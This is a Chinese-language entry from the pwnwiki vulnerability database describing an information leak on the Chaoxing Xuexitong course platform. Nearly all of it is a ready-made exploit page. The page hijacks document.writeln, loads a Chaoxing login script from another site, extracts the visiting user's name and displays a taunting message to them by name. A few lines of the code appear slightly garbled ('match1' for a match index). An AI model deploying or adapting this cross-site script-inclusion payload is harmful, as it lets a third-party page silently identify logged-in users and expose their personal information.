◆◆0

超星学习通网课平台信息泄露漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

EXP

<!DOCTYPE html>


<head>


    <meta charset="UTF-8">


    <title>！！！</title>


</head>


<body>


    <h1 id="msg" style="color:red"></h1>


    <script>


    name=''


    islogin=1;


    document.writeln=function(text)


    {


        match=text.match(/zt_u_name">(.*?)</)


        if(match !==null)


        {


            name=match1;


        }


        if(text.search("http://passport2.chaoxing.com/wlogin")!==-1)


            islogin=0;


    }


    </script>


    <script src="https://3wfy-ans.chaoxing.com/passport/allHead.shtml"> </script>


    <script>


        if(islogin)


            msg="X星XX通并不存在什么信息泄露漏洞。是吧,"+name+"同学?";


        else


            msg="你还没有登陆X星XX通，这我还怎么装逼啊？"


        document.getElementById('msg').innerText=msg


    </script>


</body>


</html>

参考

https://drivertom.blogspot.com/2020/05/xssi.html

免费、自由、人人可编辑的漏洞库

返回顶部